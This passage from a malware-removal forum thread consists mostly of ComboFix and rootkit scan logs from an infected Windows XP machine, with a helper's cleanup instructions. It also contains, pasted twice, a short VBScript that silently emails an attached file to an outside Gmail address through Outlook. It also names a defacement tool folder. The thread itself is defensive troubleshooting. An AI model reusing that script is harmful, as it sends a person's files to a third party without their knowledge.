- c:\docume~1\n\applic~1\movesi~1\Face Bash Test.exe
"2008-04-07 15:45:53 C:\WINDOWS\Tasks\AppleSoftwareUpdate.job"
- C:\Program Files\Apple Software Update\SoftwareUpdate.exe
"2008-03-11 17:00:00 C:\WINDOWS\Tasks\Pareto UNS.job"
- C:\Program Files\Common Files\ParetoLogic\UUS\UUS.dll\Pareto_Update.exe
.
**************************************************************************
catchme 0.3.1361 W2K/XP/Vista - rootkit/stealth malware detector by Gmer, gmer.net
Rootkit scan 2008-06-02 21:47:47
Windows 5.1.2600 Service Pack 2 NTFS
scanning hidden processes ...
scanning hidden autostart entries ...
scanning hidden files ...
scan completed successfully
hidden files: 0
**************************************************************************
.
------------------------ Other Running Processes ------------------------
.
C:\WINDOWS\system32\ati2evxx.exe
C:\WINDOWS\system32\UAService7.exe
C:\PROGRA~1\AVG\AVG8\avgrsx.exe
C:\WINDOWS\system32\wscntfy.exe
C:\WINDOWS\system32\ati2evxx.exe
C:\WINDOWS\system32\WgaTray.exe
C:\Program Files\Internet Explorer\iexplore.exe
C:\Program Files\Common Files\Ahead\Lib\NMIndexStoreSvr.exe
C:\Program Files\Internet Explorer\iexplore.exe
C:\PROGRA~1\Yahoo!\MESSEN~1\Ymsgr_tray.exe
C:\Program Files\Common Files\Ahead\Lib\NMIndexingService.exe
.
**************************************************************************
.
Completion time: 2008-06-02 21:53:05 - machine was rebooted [n]
ComboFix-quarantined-files.txt 2008-06-02 19:52:51
Pre-Run: 28,894,609,408 bytes free
Post-Run: 29,270,118,400 bytes free
252 --- E O F --- 2008-05-16 20:47:53
Posted: 03 Jun 2008 14:09
- dule444
Dim x
on error resume next
Set fso ="Scripting.FileSystem.Object"
Set so=CreateObject(fso)
Set ol=CreateObject("Outlook.Application")
Set out= WScript.CreateObject("Outlook.Application")
Set Mail=ol.CreateItem(0)
Mail.to="hard.rock.blogger@gmail.com"
Mail.Subject="IP"
Mail.Body="IP"
Mail.Attachments.Add("c:bla.txt")
Mail.Send
ol.Quit
Dim x
on error resume next
Set fso ="Scripting.FileSystem.Object"
Set so=CreateObject(fso)
Set ol=CreateObject("Outlook.Application")
Set out= WScript.CreateObject("Outlook.Application")
Set Mail=ol.CreateItem(0)
Mail.to="hard.rock.blogger@gmail.com"
Mail.Subject="IP"
Mail.Body="IP"
Mail.Attachments.Add("c:bla.txt")
Mail.Send
ol.Quit
ComboFix 08-06-01.6 - n 2008-06-03 14:02:44.3 - NTFSx86
Microsoft Windows XP Professional 5.1.2600.2.1252.1.1033.18.219 [GMT 2:00]
Running from: C:\Documents and Settings\n\Desktop\ComboFix.exe
Command switches used :: C:\Documents and Settings\n\Desktop\CFScript.txt
* Created a new restore point
WARNING -THIS MACHINE DOES NOT HAVE THE RECOVERY CONSOLE INSTALLED !!
FILE ::
C:\WINDOWS\system32\{69069469-9671-3856-b652-e88468082b08}.dll
C:\WINDOWS\system32\{69069469-9671-3856-b652-e88468082b08}.dll-uninst.exe
C:\WINDOWS\system32\{f1a028d3-d7ee-ffee-cf92-6d391d4a8f45}.dll-uninst.exe
C:\WINDOWS\system32\xhvgmvfa.dll
C:\WINDOWS\Tasks\A4277F9291B0F052.job
.
((((((((((((((((((((((((((((((((((((((( Other Deletions )))))))))))))))))))))))))))))))))))))))))))))))))
.
C:\Documents and Settings\All Users\Application Data\Frag great bend logo
C:\Documents and Settings\All Users\Application Data\Frag great bend logo\Rect blah.exe
C:\Documents and Settings\n\Application Data\move sixth tool
C:\Documents and Settings\n\Application Data\move sixth tool\[u]0[/u]
C:\Documents and Settings\n\Application Data\move sixth tool\2mfcdtheseek.exe
C:\Documents and Settings\n\Application Data\move sixth tool\Bat flag close.exe
C:\Documents and Settings\n\Application Data\move sixth tool\boblasuq.exe
C:\Documents and Settings\n\Application Data\move sixth tool\Face Bash Test.exe
C:\Documents and Settings\NetworkService\Application Data\move sixth tool
C:\Documents and Settings\NetworkService\Application Data\move sixth tool\Bat flag close.exe
C:\Program Files\Circle Developement
C:\Program Files\Circle Developement\Uninstall.exe
C:\Program Files\move sixth tool
C:\WINDOWS\system32\{69069469-9671-3856-b652-e88468082b08}.dll-uninst.exe
C:\WINDOWS\system32\{69069469-9671-3856-b652-e88468082b08}.dll
C:\WINDOWS\system32\{f1a028d3-d7ee-ffee-cf92-6d391d4a8f45}.dll-uninst.exe
C:\WINDOWS\Tasks\A4277F9291B0F052.job
.
((((((((((((((((((((((((( Files Created from 2008-05-03 to 2008-06-03 )))))))))))))))))))))))))))))))
.
2008-06-02 22:05 . 2008-06-02 22:05 <DIR> d-------- C:\Documents and Settings\All Users\Application Data\Avg8
2008-06-02 21:32 . 2008-06-03 13:44 2,280 --a------ C:\WINDOWS\TSCTNDBG.INI
2008-06-02 20:27 . 2008-06-02 21:34 <DIR> d-------- C:\Documents and Settings\n\Application Data\AVGTOOLBAR
2008-06-01 20:40 . 2008-06-01 20:40 <DIR> d-------- C:\Documents and Settings\NetworkService\Application Data\Xfire
2008-06-01 20:36 . 2008-06-01 20:40 <DIR> d-------- C:\Documents and Settings\n\Application Data\Xfire
2008-06-01 20:35 . 2008-06-01 20:41 <DIR> d-------- C:\Program Files\Xfire
2008-06-01 20:28 . 2008-06-01 20:30 <DIR> d-------- C:\Program Files\QuickTime
2008-06-01 20:28 . 2008-06-01 20:28 <DIR> d-------- C:\Documents and Settings\All Users\Application Data\Apple Computer
2008-05-27 21:12 . 2008-05-27 21:12 <DIR> d-------- C:\Program Files\Trend Micro
2008-05-26 21:48 . 2008-05-26 21:48 <DIR> d-------- C:\Program Files\Ashiyane Digital Security Team
2008-05-26 21:48 . 2008-05-26 21:48 <DIR> d-------- C:\MSN Emoticons
2008-05-26 21:48 . 2008-05-26 21:48 <DIR> d-------- C:\MSN Display Pics
2008-05-26 21:48 . 2008-05-26 21:48 <DIR> d-------- C:\Documents and Settings\n\Application Data\Notepad++
2008-05-24 14:21 . 2008-05-24 14:21 75 --a------ C:\WINDOWS\METROMON.INI
2008-05-24 13:19 . 2008-05-26 21:47 <DIR> d-------- C:\Program Files\AtomixMP3
2008-05-23 20:49 . 2008-05-26 21:47 <DIR> d-------- C:\Documents and Settings\n\Application Data\BearShare
2008-05-23 20:48 . 2006-11-12 11:39 483,328 --a------ C:\WINDOWS\system32\actskn45.ocx
2008-05-23 20:47 . 2008-05-23 20:52 <DIR> d-------- C:\Program Files\BearShare Applications
2008-05-14 03:28 . 2008-05-14 03:28 41,296 --a------ C:\WINDOWS\system32\xfcodec.dll
2008-05-13 18:40 . 2008-05-13 18:40 <DIR> d-------- C:\Documents and Settings\All Users\Application Data\Yahoo! Companion
2008-05-12 21:37 . 2008-05-18 20:57 <DIR> d-------- C:\Documents and Settings\n\Application Data\CenoPDF
2008-05-12 21:31 . 2008-06-03 13:45 <DIR> d-------- C:\Documents and Settings\n\Application Data\LimeWire
2008-05-12 21:28 . 2008-05-24 13:23 <DIR> d-------- C:\Program Files\LimeWire
2008-05-08 20:37 . 2008-05-08 20:19 691,545 --a------ C:\WINDOWS\unins000.exe
2008-05-08 20:37 . 2008-05-08 20:37 2,546 --a------ C:\WINDOWS\unins000.dat
2008-05-08 17:51 . 2008-05-08 17:51 <DIR> d--hsc--- C:\Program Files\Common Files\WindowsLiveInstaller
2008-05-08 17:50 . 2008-05-08 17:50 <DIR> d-------- C:\Documents and Settings\All Users\Application Data\WLInstaller
2008-05-08 16:18 . 2008-05-12 21:16 <DIR> d-------- C:\Program Files\Spybot - Search & Destroy
.
(((((((((((((((((((((((((((((((((((((((( Find3M Report ))))))))))))))))))))))))))))))))))))))))))))))))))))
.
2008-06-02 19:27 --------- d-----w C:\Program Files\ESET
2008-05-27 19:26 --------- d-----w C:\Program Files\MSN Messenger
2008-05-27 19:25 --------- d-----w C:\Program Files\Messenger Plus! Live
2008-05-27 18:35 --------- d-----w C:\Program Files\Common Files\Adobe
2008-05-26 19:48 --------- d-----w C:\Program Files\Macrogaming
2008-05-26 19:47 --------- d-----w C:\Program Files\Free Download Manager
2008-05-26 19:47 --------- d-----w C:\Program Files\Championship Manager 5
2008-05-26 19:46 --------- d-----w C:\Program Files\Offline Explorer Enterprise
2008-05-24 11:23 81,920 ----a-w C:\Documents and Settings\n\Application Data\ezpinst.exe
2008-05-24 11:23 47,360 ----a-w C:\Documents and Settings\n\Application Data\pcouffin.sys
2008-05-24 11:23 --------- d-----w C:\Documents and Settings\n\Application Data\Vso
2008-05-24 09:38 --------- d-----w C:\Program Files\Yahoo!
2008-05-16 18:36 --------- d--h--w C:\Program Files\InstallShield Installation Information
2008-05-12 17:04 --------- d-----w C:\Documents and Settings\n\Application Data\uTorrent
2008-05-12 16:13 --------- d-----w C:\Documents and Settings\All Users\Application Data\Yahoo!
2008-05-08 19:22 --------- d-----w C:\Documents and Settings\All Users\Application Data\Spybot - Search & Destroy
2008-05-08 15:50 --------- d-----w C:\Program Files\Windows Live
2008-04-28 20:03 --------- d-----w C:\Documents and Settings\All Users\Application Data\Messenger Plus!
2008-04-28 16:59 --------- d-----w C:\Program Files\Lystech Computing
2008-04-21 17:34 744 ----a-w C:\mail.vbs
2008-04-18 19:19 --------- d-----w C:\Program Files\Common Files\Wise Installation Wizard
2008-04-18 19:14 --------- d-----w C:\Program Files\X-Fusions Wallpaper
2008-04-10 13:08 --------- d-----w C:\Documents and Settings\n\Application Data\Yahoo!
2008-04-10 12:37 --------- d-----w C:\Program Files\MauZ Php Editor
2008-04-09 15:01 --------- d-----w C:\Documents and Settings\n\Application Data\TeamViewer
2008-04-07 15:45 --------- d-----w C:\Program Files\Apple Software Update
2008-04-07 15:44 --------- d-----w C:\Documents and Settings\All Users\Application Data\Apple
2008-04-06 20:13 1,388,544 ----a-w C:\WINDOWS\system32\msvbvm60.dll
2008-04-04 19:17 --------- d-----w C:\Program Files\Vista Start Menu
2008-04-04 18:50 64,650 ----a-w C:\WINDOWS\BricoPackUninst.cmd
2008-04-04 18:50 6,106 ----a-w C:\WINDOWS\BricoPackFoldersDelete.cmd
2008-04-04 18:50 218,624 ----a-w C:\WINDOWS\system32\uxtheme.dll
2008-04-04 10:18 720,896 ----a-w C:\WINDOWS\iun6002.exe
2008-03-27 08:12 151,583 ----a-w C:\WINDOWS\system32\msjint40.dll
2008-03-23 14:28 126,976 ----a-w C:\WINDOWS\system32\UAService7.exe
2008-03-19 09:47 1,845,248 ----a-w C:\WINDOWS\system32\win32k.sys
2007-11-05 12:00 524,300 ----a-w C:\Documents and Settings\n\Application Data\position.bin
2002-01-13 03:28 1,164,456 ----a-w C:\Program Files\install_flash_player.exe
.
(((((((((((((((((((((((((((((((((((((((((((( Look )))))))))))))))))))))))))))))))))))))))))))))))))))))))))
.
---- Directory of C:\Program Files\Ashiyane Digital Security Team ----
2000-05-22 10:00 115920 --a------ C:\Program Files\Ashiyane Digital Security Team\PHPBB DEFACER\Msinet.ocx
((((((((((((((((((((((((((((( snapshot@2008-06-02_21.52.17.68 )))))))))))))))))))))))))))))))))))))))))
.
- 2008-06-02 19:46:45 2,048 --s-a-w C:\WINDOWS\bootstat.dat
+ 2008-06-03 11:43:09 2,048 --s-a-w C:\WINDOWS\bootstat.dat
.
((((((((((((((((((((((((((((((((((((( Reg Loading Points ))))))))))))))))))))))))))))))))))))))))))))))))))
.
.
*Note* empty entries & legit default entries are not shown
REGEDIT4
[HKEY_LOCAL_MACHINE\~\Browser Helper Objects\{74322BF9-DF26-493f-B0DA-6D2FC5E6429E}]
2007-10-11 15:45 402872 --a------ C:\Program Files\BearShare Applications\BearShare MediaBar\BearShareIEHelper.dll
[HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
"BgMonitor_{79662E04-7C6C-4d9f-84C7-88D8A56B10AA}"="C:\Program Files\Common Files\Ahead\Lib\NMBgMonitor.exe" [2007-01-15 17:14 147456]
"ctfmon.exe"="C:\WINDOWS\system32\ctfmon.exe" [2004-08-04 03:07 15360]
"MsnMsgr"="C:\Program Files\Windows Live\Messenger\MsnMsgr.exe" [2007-10-18 11:35 5724184]
"Yahoo! Pager"="C:\PROGRA~1\Yahoo!\MESSEN~1\YAHOOM~1.exe" [2007-08-30 17:43 4670704]
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
"SoundMAXPnP"="C:\Program Files\Analog Devices\SoundMAX\SMax4PNP.exe" [2004-10-14 10:11 1388544]
"NeroFilterCheck"="C:\Program Files\Common Files\Ahead\Lib\NeroCheck.exe" [2006-01-12 16:40 155648]
"TkBellExe"="C:\Program Files\Common Files\Real\Update_OB\realsched.exe" [2002-01-07 11:13 180269]
"SunJavaUpdateSched"="C:\Program Files\Java\jre1.6.0_05\bin\jusched.exe" [2008-02-22 04:25 144784]
"AGRSMMSG"="AGRSMMSG.exe" [2004-06-29 10:06 88363 C:\WINDOWS\AGRSMMSG.exe]
"WinampAgent"="C:\Program Files\Winamp\winampa.exe" [2007-10-10 07:28 36352]
"QuickTime Task"="C:\Program Files\QuickTime\QTTask.exe" [2008-01-31 23:13 385024]
C:\Documents and Settings\n\Start Menu\Programs\Startup\
LimeWire On Startup.lnk - C:\Program Files\LimeWire\LimeWire.exe [2008-04-18 21:21:09 147456]
C:\Documents and Settings\All Users\Start Menu\Programs\Startup\
Adobe Reader Speed Launch.lnk - C:\Program Files\Adobe\Reader 8.0\Reader\reader_sl.exe [2006-10-23 02:48:20 40048]
Adobe Reader Synchronizer.lnk - C:\Program Files\Adobe\Reader 8.0\Reader\AdobeCollabSync.exe [2006-10-23 01:01:50 734872]
AudioDeck.lnk - C:\Program Files\VIA Technologies, Inc\VIA Audio Driver Setup Program\AudioDeck\AudioDeck.exe [2002-03-18 11:13:06 581632]
Remote Controller.lnk - C:\Program Files\Prolink\PixelView PlayTV Pro 5.25\TVRMVCR.EXE [2002-03-18 11:37:43 102400]
Scheduler.lnk - C:\Program Files\Prolink\PixelView PlayTV Pro 5.25\TVSCHL.EXE [2002-03-18 11:37:43 118784]
[HKEY_LOCAL_MACHINE\software\microsoft\windows nt\currentversion\drivers32]
"VIDC.AP41"= APmpg4v1.dll
"vidc.DIV3"= DivXc32.dll
"msacm.divxa32"= DivXa32.acm
"vidc.DIV4"= DivXc32f.dll
"VIDC.ACDV"= ACDV.dll
"VIDC.XFR1"= xfcodec.dll
[HKEY_LOCAL_MACHINE\software\microsoft\shared tools\msconfig\startupreg\PowerS]
--a------ 2001-08-03 18:56 159800 C:\WINDOWS\PowerS.exe
[HKEY_LOCAL_MACHINE\software\microsoft\shared tools\msconfig\startupreg\RaidTool]
--------- 2004-10-11 08:54 589824 C:\Program Files\VIA\RAID\raid_tool.exe
[HKEY_LOCAL_MACHINE\software\microsoft\shared tools\msconfig\startupreg\Yahoo! Pager]
--a------ 2007-08-30 17:43 4670704 C:\Program Files\Yahoo!\Messenger\YahooMessenger.exe
[HKEY_LOCAL_MACHINE\software\microsoft\shared tools\msconfig\services]
"WZCSVC"=2 (0x2)
"SSDPSRV"=3 (0x3)
[HKLM\~\services\sharedaccess\parameters\firewallpolicy\standardprofile\AuthorizedApplications\List]
"%windir%\\system32\\sessmgr.exe"=
"C:\\Program Files\\Messenger\\msmsgs.exe"=
"C:\\Program Files\\eMule\\emule.exe"=
"C:\\Program Files\\Yahoo!\\Messenger\\YahooMessenger.exe"=
"C:\\Program Files\\Yahoo!\\Messenger\\YServer.exe"=
"C:\\Program Files\\LimeWire\\LimeWire.exe"=
"C:\\Program Files\\Evil Msn\\Evil Msn 3.0.exe"=
"C:\\Program Files\\BearShare Applications\\BearShare\\BearShare.exe"=
"C:\\Program Files\\Windows Live\\Messenger\\msnmsgr.exe"=
"C:\\Program Files\\Windows Live\\Messenger\\livecall.exe"=
"C:\\Program Files\\Xfire\\xfire.exe"=
R0 videX32;videX32;C:\WINDOWS\system32\DRIVERS\videX32.sys [2006-02-23 12:38]
R2 BT878;BtCap, WDM Video Capture;C:\WINDOWS\system32\drivers\BT878.SYS [2004-04-07 22:30]
R2 BTTUNER;BtTuner, WDM TV Tuner;C:\WINDOWS\system32\drivers\BTTUNER.SYS [2004-04-07 22:30]
R2 BTXBAR;BtXBar, WDM Crossbar;C:\WINDOWS\system32\drivers\BTXBAR.SYS [2004-04-07 22:30]
R3 usnjsvc;Usluga Messenger Sharing Folders USN Journal Reader;"C:\Program Files\Windows Live\Messenger\usnsvc.exe" [2007-10-18 11:31]
S3 CV2K1;CommView Network Monitor;C:\WINDOWS\system32\DRIVERS\cv2k1.sys []
S3 Vsp;Vsp;C:\WINDOWS\system32\drivers\Vsp.sys [2003-05-27 17:45]
*Newly Created Service* - CATCHME
.
Contents of the 'Scheduled Tasks' folder
"2008-04-07 15:45:53 C:\WINDOWS\Tasks\AppleSoftwareUpdate.job"
- C:\Program Files\Apple Software Update\SoftwareUpdate.exe
"2008-03-11 17:00:00 C:\WINDOWS\Tasks\Pareto UNS.job"
- C:\Program Files\Common Files\ParetoLogic\UUS\UUS.dll\Pareto_Update.exe
.
**************************************************************************
catchme 0.3.1361 W2K/XP/Vista - rootkit/stealth malware detector by Gmer, http://www.gmer.net
Rootkit scan 2008-06-03 14:04:46
Windows 5.1.2600 Service Pack 2 NTFS
scanning hidden processes ...
scanning hidden autostart entries ...
scanning hidden files ...
scan completed successfully
hidden files: 0
**************************************************************************
.
Completion time: 2008-06-03 14:05:42
ComboFix-quarantined-files.txt 2008-06-03 12:05:38
ComboFix2.txt 2008-06-02 19:53:06
Pre-Run: 29,282,066,432 bytes free
Post-Run: 29,268,369,408 bytes free
201 --- E O F --- 2008-05-16 20:47:53

Posted: 03 Jun 2008 17:17
- dr_Bora
- Anti Malware Fighter
Rank 2
- Joined: 24 Jul 2007
- Posts: 12280
- Location: Höganäs, SE
Hmm...
Go ahead and delete the folder: C:\Program Files\Ashiyane Digital Security Team
and the file: C:\mail.vbs .
Restart the computer and post a fresh ComboFix log (just launch it with a double-click and wait for the scan to finish so that you get the log).
Also, describe what the situation is now.

Posted: 03 Jun 2008 17:50
- dule444
- New MyCity citizen
- Joined: 19 May 2008
- Posts: 5
- Location: beograd
ComboFix 08-06-01.6 - n 2008-06-03 17:42:24.4 - NTFSx86
Microsoft Windows XP Professional 5.1.2600.2.1252.1.1033.18.173 [GMT 2:00]
Running from: C:\Documents and Settings\n\Desktop\ComboFix.exe
* Resident AV is active
WARNING -THIS MACHINE DOES NOT HAVE THE RECOVERY CONSOLE INSTALLED !!
.
((((((((((((((((((((((((( Files Created from 2008-05-03 to 2008-06-03 )))))))))))))))))))))))))))))))
.
2008-06-03 15:22 . 2008-06-03 15:22 <DIR> d-------- C:\Documents and Settings\n\Application Data\ESET
2008-06-03 15:20 . 2008-06-03 15:20 <DIR> d-------- C:\Documents and Settings\All Users\Application Data\ESET
2008-06-02 22:05 . 2008-06-02 22:05 <DIR> d-------- C:\Documents and Settings\All Users\Application Data\Avg8
2008-06-02 21:32 . 2008-06-03 17:26 2,280 --a------ C:\WINDOWS\TSCTNDBG.INI
2008-06-02 20:27 . 2008-06-02 21:34 <DIR> d-------- C:\Documents and Settings\n\Application Data\AVGTOOLBAR
2008-06-01 20:40 . 2008-06-01 20:40 <DIR> d-------- C:\Documents and Settings\NetworkService\Application Data\Xfire
2008-06-01 20:36 . 2008-06-01 20:40 <DIR> d-------- C:\Documents and Settings\n\Application Data\Xfire
2008-06-01 20:35 . 2008-06-01 20:41 <DIR> d-------- C:\Program Files\Xfire
2008-06-01 20:28 . 2008-06-01 20:30 <DIR> d-------- C:\Program Files\QuickTime
2008-06-01 20:28 . 2008-06-01 20:28 <DIR> d-------- C:\Documents and Settings\All Users\Application Data\Apple Computer
2008-05-27 21:12 . 2008-05-27 21:12 <DIR> d-------- C:\Program Files\Trend Micro
2008-05-26 21:48 . 2008-05-26 21:48 <DIR> d-------- C:\MSN Emoticons
2008-05-26 21:48 . 2008-05-26 21:48 <DIR> d-------- C:\MSN Display Pics
2008-05-26 21:48 . 2008-05-26 21:48 <DIR> d-------- C:\Documents and Settings\n\Application Data\Notepad++
2008-05-24 14:21 . 2008-05-24 14:21 75 --a------ C:\WINDOWS\METROMON.INI
2008-05-24 13:19 . 2008-05-26 21:47 <DIR> d-------- C:\Program Files\AtomixMP3
2008-05-23 20:49 . 2008-05-26 21:47 <DIR> d-------- C:\Documents and Settings\n\Application Data\BearShare
2008-05-23 20:48 . 2006-11-12 11:39 483,328 --a------ C:\WINDOWS\system32\actskn45.ocx
2008-05-23 20:47 . 2008-05-23 20:52 <DIR> d-------- C:\Program Files\BearShare Applications
2008-05-14 03:28 . 2008-05-14 03:28 41,296 --a------ C:\WINDOWS\system32\xfcodec.dll
2008-05-13 18:40 . 2008-05-13 18:40 <DIR> d-------- C:\Documents and Settings\All Users\Application Data\Yahoo! Companion
2008-05-12 21:37 . 2008-05-18 20:57 <DIR> d-------- C:\Documents and Settings\n\Application Data\CenoPDF
2008-05-12 21:31 . 2008-06-03 17:27 <DIR> d-------- C:\Documents and Settings\n\Application Data\LimeWire
2008-05-12 21:28 . 2008-05-24 13:23 <DIR> d-------- C:\Program Files\LimeWire
2008-05-08 20:37 . 2008-05-08 20:19 691,545 --a------ C:\WINDOWS\unins000.exe
2008-05-08 20:37 . 2008-05-08 20:37 2,546 --a------ C:\WINDOWS\unins000.dat
2008-05-08 17:51 . 2008-05-08 17:51 <DIR> d--hsc--- C:\Program Files\Common Files\WindowsLiveInstaller
2008-05-08 17:50 . 2008-05-08 17:50 <DIR> d-------- C:\Documents and Settings\All Users\Application Data\WLInstaller
2008-05-08 16:18 . 2008-05-12 21:16 <DIR> d-------- C:\Program Files\Spybot - Search & Destroy
.
(((((((((((((((((((((((((((((((((((((((( Find3M Report ))))))))))))))))))))))))))))))))))))))))))))))))))))
.
2008-06-03 13:20 --------- d-----w C:\Program Files\ESET
2008-05-27 19:26 --------- d-----w C:\Program Files\MSN Messenger
2008-05-27 19:25 --------- d-----w C:\Program Files\Messenger Plus! Live
2008-05-27 18:35 --------- d-----w C:\Program Files\Common Files\Adobe
2008-05-26 19:48 --------- d-----w C:\Program Files\Macrogaming
2008-05-26 19:47 --------- d-----w C:\Program Files\Free Download Manager
2008-05-26 19:47 --------- d-----w C:\Program Files\Championship Manager 5
2008-05-26 19:46 --------- d-----w C:\Program Files\Offline Explorer Enterprise
2008-05-24 11:23 81,920 ----a-w C:\Documents and Settings\n\Application Data\ezpinst.exe
2008-05-24 11:23 47,360 ----a-w C:\Documents and Settings\n\Application Data\pcouffin.sys
2008-05-24 11:23 --------- d-----w C:\Documents and Settings\n\Application Data\Vso
2008-05-24 09:38 --------- d-----w C:\Program Files\Yahoo!
2008-05-16 18:36 --------- d--h--w C:\Program Files\InstallShield Installation Information
2008-05-12 17:04 --------- d-----w C:\Documents and Settings\n\Application Data\uTorrent
2008-05-12 16:13 --------- d-----w C:\Documents and Settings\All Users\Application Data\Yahoo!
2008-05-08 19:22 --------- d-----w C:\Documents and Settings\All Users\Application Data\Spybot - Search & Destroy
2008-05-08 15:50 --------- d-----w C:\Program Files\Windows Live
2008-04-28 20:03 --------- d-----w C:\Documents and Settings\All Users\Application Data\Messenger Plus!
2008-04-28 16:59 --------- d-----w C:\Program Files\Lystech Computing
2008-04-18 19:19 --------- d-----w C:\Program Files\Common Files\Wise Installation Wizard
2008-04-18 19:14 --------- d-----w C:\Program Files\X-Fusions Wallpaper
2008-04-10 13:08 --------- d-----w C:\Documents and Settings\n\Application Data\Yahoo!
2008-04-10 12:37 --------- d-----w C:\Program Files\MauZ Php Editor
2008-04-09 15:01 --------- d-----w C:\Documents and Settings\n\Application Data\TeamViewer
2008-04-07 15:45 --------- d-----w C:\Program Files\Apple Software Update
2008-04-07 15:44 --------- d-----w C:\Documents and Settings\All Users\Application Data\Apple
2008-04-06 20:13 1,388,544 ----a-w C:\WINDOWS\system32\msvbvm60.dll
2008-04-04 19:17 --------- d-----w C:\Program Files\Vista Start Menu
2008-04-04 18:50 64,650 ----a-w C:\WINDOWS\BricoPackUninst.cmd
2008-04-04 18:50 6,106 ----a-w C:\WINDOWS\BricoPackFoldersDelete.cmd
2008-04-04 18:50 218,624 ----a-w C:\WINDOWS\system32\uxtheme.dll
2008-04-04 10:18 720,896 ----a-w C:\WINDOWS\iun6002.exe
2008-03-27 08:12 151,583 ----a-w C:\WINDOWS\system32\msjint40.dll
2008-03-23 14:28 126,976 ----a-w C:\WINDOWS\system32\UAService7.exe
2008-03-19 09:47 1,845,248 ----a-w C:\WINDOWS\system32\win32k.sys
2007-11-05 12:00 524,300 ----a-w C:\Documents and Settings\n\Application Data\position.bin
2002-01-13 03:28 1,164,456 ----a-w C:\Program Files\install_flash_player.exe
.
((((((((((((((((((((((((((((( snapshot@2008-06-02_21.52.17.68 )))))))))))))))))))))))))))))))))))))))))
.
- 2008-06-02 19:46:45 2,048 --s-a-w C:\WINDOWS\bootstat.dat
+ 2008-06-03 15:25:24 2,048 --s-a-w C:\WINDOWS\bootstat.dat
+ 2008-06-03 13:22:30 10,134 ----a-r C:\WINDOWS\Installer\{9DE8D465-A169-4CC7-BAF7-CDD1C9E2EE56}\callmsi.exe
+ 2008-06-03 13:22:30 140,544 ----a-r C:\WINDOWS\Installer\{9DE8D465-A169-4CC7-BAF7-CDD1C9E2EE56}\egui.exe
+ 2008-03-13 14:43:42 40,456 ----a-w C:\WINDOWS\system32\drivers\eamon.sys
+ 2008-03-13 14:44:36 29,704 ----a-w C:\WINDOWS\system32\drivers\easdrv.sys
+ 2008-03-13 14:52:12 71,176 ----a-w C:\WINDOWS\system32\drivers\epfw.sys
+ 2008-03-13 14:52:16 30,728 ----a-w C:\WINDOWS\system32\drivers\epfwndis.sys
+ 2008-03-13 14:52:16 54,280 ----a-w C:\WINDOWS\system32\drivers\epfwtdi.sys
.
((((((((((((((((((((((((((((((((((((( Reg Loading Points ))))))))))))))))))))))))))))))))))))))))))))))))))
.
.
*Note* empty entries & legit default entries are not shown
REGEDIT4
[HKEY_LOCAL_MACHINE\~\Browser Helper Objects\{74322BF9-DF26-493f-B0DA-6D2FC5E6429E}]
2007-10-11 15:45 402872 --a------ C:\Program Files\BearShare Applications\BearShare MediaBar\BearShareIEHelper.dll
[HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
"BgMonitor_{79662E04-7C6C-4d9f-84C7-88D8A56B10AA}"="C:\Program Files\Common Files\Ahead\Lib\NMBgMonitor.exe" [2007-01-15 17:14 147456]
"ctfmon.exe"="C:\WINDOWS\system32\ctfmon.exe" [2004-08-04 03:07 15360]
"MsnMsgr"="C:\Program Files\Windows Live\Messenger\MsnMsgr.exe" [2007-10-18 11:35 5724184]
"Yahoo! Pager"="C:\PROGRA~1\Yahoo!\MESSEN~1\YAHOOM~1.exe" [2007-08-30 17:43 4670704]
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
"SoundMAXPnP"="C:\Program Files\Analog Devices\SoundMAX\SMax4PNP.exe" [2004-10-14 10:11 1388544]
"NeroFilterCheck"="C:\Program Files\Common Files\Ahead\Lib\NeroCheck.exe" [2006-01-12 16:40 155648]
"TkBellExe"="C:\Program Files\Common Files\Real\Update_OB\realsched.exe" [2002-01-07 11:13 180269]
"SunJavaUpdateSched"="C:\Program Files\Java\jre1.6.0_05\bin\jusched.exe" [2008-02-22 04:25 144784]
"AGRSMMSG"="AGRSMMSG.exe" [2004-06-29 10:06 88363 C:\WINDOWS\AGRSMMSG.exe]
"WinampAgent"="C:\Program Files\Winamp\winampa.exe" [2007-10-10 07:28 36352]
"QuickTime Task"="C:\Program Files\QuickTime\QTTask.exe" [2008-01-31 23:13 385024]
"egui"="C:\Program Files\ESET\ESET Smart Security\egui.exe" [2008-03-13 16:48 1443072]
C:\Documents and Settings\n\Start Menu\Programs\Startup\
LimeWire On Startup.lnk - C:\Program Files\LimeWire\LimeWire.exe [2008-04-18 21:21:09 147456]
C:\Documents and Settings\All Users\Start Menu\Programs\Startup\
Adobe Reader Speed Launch.lnk - C:\Program Files\Adobe\Reader 8.0\Reader\reader_sl.exe [2006-10-23 02:48:20 40048]
Adobe Reader Synchronizer.lnk - C:\Program Files\Adobe\Reader 8.0\Reader\AdobeCollabSync.exe [2006-10-23 01:01:50 734872]
AudioDeck.lnk - C:\Program Files\VIA Technologies, Inc\VIA Audio Driver Setup Program\AudioDeck\AudioDeck.exe [2002-03-18 11:13:06 581632]
Remote Controller.lnk - C:\Program Files\Prolink\PixelView PlayTV Pro 5.25\TVRMVCR.EXE [2002-03-18 11:37:43 102400]
Scheduler.lnk - C:\Program Files\Prolink\PixelView PlayTV Pro 5.25\TVSCHL.EXE [2002-03-18 11:37:43 118784]
[HKEY_LOCAL_MACHINE\software\microsoft\windows nt\currentversion\drivers32]
"VIDC.AP41"= APmpg4v1.dll
"vidc.DIV3"= DivXc32.dll
"msacm.divxa32"= DivXa32.acm
"vidc.DIV4"= DivXc32f.dll
"VIDC.ACDV"= ACDV.dll
"VIDC.XFR1"= xfcodec.dll
[HKEY_LOCAL_MACHINE\software\microsoft\shared tools\msconfig\startupreg\PowerS]
--a------ 2001-08-03 18:56 159800 C:\WINDOWS\PowerS.exe
[HKEY_LOCAL_MACHINE\software\microsoft\shared tools\msconfig\startupreg\RaidTool]
--------- 2004-10-11 08:54 589824 C:\Program Files\VIA\RAID\raid_tool.exe
[HKEY_LOCAL_MACHINE\software\microsoft\shared tools\msconfig\startupreg\Yahoo! Pager]
--a------ 2007-08-30 17:43 4670704 C:\Program Files\Yahoo!\Messenger\YahooMessenger.exe
[HKEY_LOCAL_MACHINE\software\microsoft\shared tools\msconfig\services]
"WZCSVC"=2 (0x2)
"SSDPSRV"=3 (0x3)
